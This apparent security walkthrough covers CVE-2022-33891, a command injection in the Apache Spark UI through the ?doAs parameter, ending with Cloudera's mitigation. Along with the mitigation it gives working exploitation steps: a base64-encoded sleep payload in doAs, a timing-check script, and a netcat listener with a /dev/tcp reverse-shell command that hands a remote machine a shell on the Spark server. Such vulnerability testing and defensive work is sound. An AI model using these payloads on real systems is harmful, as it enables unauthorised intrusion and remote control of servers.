CVE-2022-33891 Apache Spark Command Injection Vulnerability

 

Please refer to the official advisory - https://spark.apache.org/security.html


  • The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by running a raw Linux shell command.
  • If an attacker sends reverse-shell commands through ?doAs, there is a high chance of handing the attacker's machine shell access to the Apache Spark server.
Vulnerability description -

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.
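
To make the flaw concrete, here is a rough Python analogue of the vulnerable pattern (the real code path is Scala, reportedly Spark's ShellBasedGroupsMappingProvider; treat this as an illustrative sketch, not Spark's actual source):

    import subprocess

    def get_unix_groups(username):
        # UNSAFE: the ?doAs value is spliced into a shell command line.
        # Spark's group lookup shells out roughly like bash -c "id -Gn <user>",
        # so backticks inside the "username" are evaluated by the shell.
        result = subprocess.run(["bash", "-c", "id -Gn " + username],
                                capture_output=True, text=True)
        return result.stdout.split()

    get_unix_groups("spark")                # behaves as expected
    get_unix_groups("`touch /tmp/pwned`")   # runs the attacker's command instead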


Only the Spark UI proved vulnerable -
  • We tested the Spark History Server, which came back clean, i.e. no vulnerability
    • https://<SparkServer>:18081/
  • We tested the Spark UI of a job started with the YARN master, which also came back clean, i.e. no vulnerability
    • https://<SparkServer>:8090/proxy/application_1684801301953_15767/
    • https://<SparkServer>:4043/
  • We tested the Spark UI of a job started with the local master, and it tested positive, i.e. we were able to inject and execute shell commands on the Spark server from a remote machine
    • https://<SparkServer>:4044/


  • Please create a clone of the above git repository.
  • Install python3 and the following libraries required by the script - requests, argparse, colorama
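    For example, the two third-party libraries install with pip (argparse ships with the Python standard library) -
    • pip3 install requests colorama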

  • Start spark-shell with --master local on one of the machines in your Hadoop cluster (note that the vulnerable code path is only reachable when ACLs are enabled, i.e. spark.acls.enable=true, per the description above). This will start a Spark UI with a web URL like - http://<SparkServer>:4044/
  • Let’s check whether this target (http://<SparkServer>:4044/) is vulnerable, using the command below -
    • python3 exploit.py -u http://<Spark Server> -p 4044 --check --verbose
                  Note - the above command appends the doAs parameter to the URL and invokes it as -
      • http://<Spark Server>:4044/?doAs='testing'
      • http://<Spark Server>:4044/?doAs=`echo c2xlZXAgMTA=  | base64 -d | bash`
    • The script verifies the vulnerability by calling the above two URLs
      • The first invocation tells whether the URL honors ?doAs request parameter substitution at all.
      • If ?doAs is not supported, there cannot be command injection, hence the server is safe.
      • The second injects a base64-encoded "sleep 10" command on the remote server. If the response is delayed by 10 seconds, the remote server is vulnerable; otherwise it is not. (A minimal sketch of this timing check appears after this walkthrough.)
  • The above command tells you whether the URL is probably vulnerable.
  • Let’s use our exploit to get a reverse shell, so we can execute Unix commands on the server from a remote machine. Before that, start a netcat listener to catch the reverse-shell traffic, using the command below on some remote machine other than the Spark server -
    • nc -nvlp 9002
  • Now run the exploit command to start the reverse shell -
    • python3 exploit.py -u http://<Spark Server> -p 4044 --revshell -lh <IP_OF_REMOTE_MACHINE_RUNNING_NETCAT> -lp 9002 --verbose
    • The above command makes the Spark server open an interactive shell that connects back to the netcat listener on the remote machine, e.g. -
      • sh -i >& /dev/tcp/{IP_OF_REMOTE_MACHINE_RUNNING_NETCAT}/9002 0>&1
  • After this you should see a Unix shell on the machine running netcat. From there you can type Unix shell commands, which will actually execute on the remote Spark server -
    • whoami
    • hostname
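
As mentioned above, here is a minimal sketch of the timing-based --check logic (a hypothetical standalone script; the real exploit.py from the repository may differ in details, and --revshell delivers its payload through the same ?doAs injection):

    import base64
    import sys
    import time

    import requests

    def is_vulnerable(base_url, delay=10):
        # Benign probe - the 'testing' user from the walkthrough above just
        # confirms the UI answers requests carrying the ?doAs parameter.
        requests.get(base_url, params={"doAs": "testing"}, timeout=30)

        # Injection probe - base64 hides the shell metacharacters, and the
        # backticks make Spark's group-lookup shell-out execute the command.
        encoded = base64.b64encode(f"sleep {delay}".encode()).decode()
        payload = f"`echo {encoded} | base64 -d | bash`"
        start = time.monotonic()
        requests.get(base_url, params={"doAs": payload}, timeout=delay + 30)
        # A response delayed by at least `delay` seconds means the sleep ran.
        return time.monotonic() - start >= delay

    if __name__ == "__main__":
        # Usage: python3 check.py http://<SparkServer>:4044/
        print("likely vulnerable" if is_vulnerable(sys.argv[1]) else "no delay observed")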

To mitigate the issue -
  • Cloudera suggests disabling the following properties (if enabled)
    • spark.history.ui.acls.enable / spark.acls.enable
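
For example, in spark-defaults.conf (or the equivalent safety-valve snippet in Cloudera Manager) - note this disables the ACL feature entirely; upgrading to a fixed Spark release listed on the security page linked above is the complete remedy:

    spark.acls.enable              false
    spark.history.ui.acls.enable   false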
                        
